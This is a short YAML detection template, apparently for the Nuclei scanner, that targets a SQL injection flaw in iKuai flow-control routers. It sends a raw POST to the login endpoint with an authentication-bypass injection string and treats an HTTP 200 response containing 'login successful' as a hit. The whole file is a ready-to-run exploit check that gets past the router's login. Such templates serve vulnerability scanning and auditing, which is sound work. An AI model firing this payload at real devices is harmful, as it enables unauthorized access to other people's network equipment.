id: iKuai-sqli

info:
  name: iKuai（爱快） 流控路由 SQL注入漏洞
  author: Str1am
  severity: high
  tags: iKuai,sqli

requests:
  - raw:
      - |
        POST /login/x HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        "or""=""or""="

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "\u767b\u5f55\u6210\u529f"
        part: body
        condition: and